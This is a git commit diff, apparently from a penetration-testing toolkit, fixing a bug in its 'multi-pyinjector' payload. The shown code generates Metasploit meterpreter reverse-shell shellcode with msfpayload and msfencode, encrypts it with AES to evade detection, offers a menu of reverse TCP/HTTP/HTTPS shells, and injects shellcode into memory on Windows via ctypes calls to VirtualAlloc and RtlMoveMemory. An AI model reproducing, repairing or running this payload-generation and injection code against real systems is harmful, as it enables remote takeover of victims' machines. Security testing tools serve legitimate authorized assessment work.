Fixed a large bug in multi-pyinjector which would cause it to not work properly.

2024-12-13 14:32:33 +00:00 · 2013-07-29 11:03:56 -04:00 · 2013-07-29 11:03:56 -04:00 · 20c1d6b4de
commit 20c1d6b4de
parent 8b77266adf
3 changed files with 6 additions and 3 deletions
--- a/src/core/payloadgen/create_payloads.py
+++ b/src/core/payloadgen/create_payloads.py
@ -387,6 +387,7 @@ try:
                        print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
                        subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/meterpreter.raw" % (path,choice9,choice2,portnum,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
                        subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/meterpreter.raw -t raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (path,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+
                    if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
                    # define, this will eventually be all of our payloads
                        multipyinject_payload = ""
@ -394,6 +395,8 @@ try:
                        if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
                            os.remove("%s/meta_config_multipyinjector" % (setdir))
                        while 1:
+                        
+                        
                            if choice1 == "shellcode/multipyinject":
                                print ("\nSelect the payload you want to deliver via shellcode injection\n\n   1) Windows Meterpreter Reverse TCP\n   2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n   3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n   4) Windows Meterpreter (ALL PORTS) Reverse TCP\n   5) Windows Reverse Command Shell\n   6) I'm finished adding payloads.\n")
                                choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
@ -454,14 +457,14 @@ try:
                            # break out of the loop if we are only using one payload else keep on
                            if choice1 == "shellcode/pyinject": break
                            multipyinject_payload += shellcode + ","
-
+                        
                        # get rid of tail comma
                        if multipyinject_payload.endswith(","):
                            multipyinject_payload = multipyinject_payload[:-1]
+
                        # if we have multiple payloads, use multi injector
                        if choice1 == "shellcode/multipyinject":
                            # we first need to encrypt the payload via AES 256
-                            # def encryptAES(secret, data):
                            print_status("Encrypting the shellcode via 256 AES encryption..")
                            secret = os.urandom(32)
                            shellcode = encryptAES(secret, multipyinject_payload)
--- a/src/payloads/set_payloads/multi_pyinjector.binary
+++ b/src/payloads/set_payloads/multi_pyinjector.binary
--- a/src/payloads/set_payloads/multi_pyinjector.py
+++ b/src/payloads/set_payloads/multi_pyinjector.py
@ -27,7 +27,7 @@ def injection(sc):
                                              ctypes.c_int(0x40))
    ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
                                       ctypes.c_int(len(sc)))
-    buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
+    buf = (ctypes.c_char * len(sc)).from_buffer(sc)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(sc)))